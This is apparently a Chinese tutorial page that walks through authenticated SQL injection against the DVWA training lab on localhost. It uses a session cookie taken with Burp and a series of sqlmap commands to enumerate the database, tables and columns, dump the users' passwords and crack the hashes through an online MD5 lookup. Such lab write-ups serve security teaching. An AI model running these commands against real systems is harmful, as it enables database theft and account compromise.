[Python知识库] 利用sqlmap进行需要登录的注入

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> Python知识库 -> 利用sqlmap进行需要登录的注入 -> 正文阅读

[Python知识库]利用sqlmap进行需要登录的注入

需要登录的注入

- 1.利用bp获取cookie
- 2.利用sqlmap获取用户名密码

1.利用bp获取cookie

在这里插入图片描述

2.利用sqlmap获取用户名密码

cookie注入命令：sqlmap.py -u 注入点 --cookie=”获取的cookie”
sqlmap.py -u http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie=“security=low; PHPSESSID=9djnnv81n3lmgmu4sno9825j42”

在这里插入图片描述
当前数据库

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=9djnnv81n3lmgmu4sno9825j42" --current-db

在这里插入图片描述
数据表名称

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=9djnnv81n3lmgmu4sno9825j42" -D dvwa --tables

在这里插入图片描述

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=9djnnv81n3lmgmu4sno9825j42" -D dvwa -T users --columns

在这里插入图片描述

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=9djnnv81n3lmgmu4sno9825j42" -D dvwa -T users -C “user,password” --dump

接下来选择nn即可得到账户密码
在这里插入图片描述
利用MD5解码即可
https://cmd5.com/